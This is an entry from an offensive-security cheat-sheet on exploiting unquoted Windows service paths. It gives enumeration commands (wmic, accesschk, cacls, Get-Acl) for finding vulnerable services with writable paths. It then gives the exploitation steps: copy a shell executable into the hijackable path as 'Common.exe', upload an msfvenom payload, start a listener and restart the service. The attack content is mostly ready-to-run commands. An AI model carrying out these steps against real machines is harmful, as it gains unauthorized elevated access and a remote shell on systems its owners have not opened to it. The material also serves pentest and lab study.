killchain-compendium/Exploits/Windows/Unquoted Path.md

Unquoted Path

• Path to a service without quotes can be hijacked by inserting other executables and services into the path.
• Some part of path has to be writeable, windows tries to insert .exe instead of a space.
• Check services via wmic service get name,displayname,pathname,startmode and sc qc <servicename>
• Check permissions on paths via .\accesschk64.exe /accepteula -uwdq "C:\Service Path\"

Enumeration

• Check paths

wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """

• Check permissions on these paths

cacls "c:\program files\directory"
powershell -c "Get-WMIObject -Class Win32_Service -Filter \"Name='<service name>'\" | select-object *"

Example

• The unquoted path is C:\Program Files\Unquoted Path Service\Common Files\unquotedpathservice.exe

copy C:\shell.exe "C:\Program Files\Unquoted Path Service\Common.exe"

net start <service>

Intel about Service

• Access should contain writeable

Get-Acl -Path <path> | Format-List

• Save the script Get-ServiceAcl.ps1 and Import-Module Get-ServiceAcl.ps1

• Check ServiceRights via

"<servicename>" | Get-ServiceAcl | select ExpandProperty Access

Interacting with the Service

• Upload msfvenom shell to the writeable path, setup listener and

sc start "servicename"
Stop-Service -name "servicename"
Start-Service -name "servicename"

PoC

• MattyMcFatty's PoC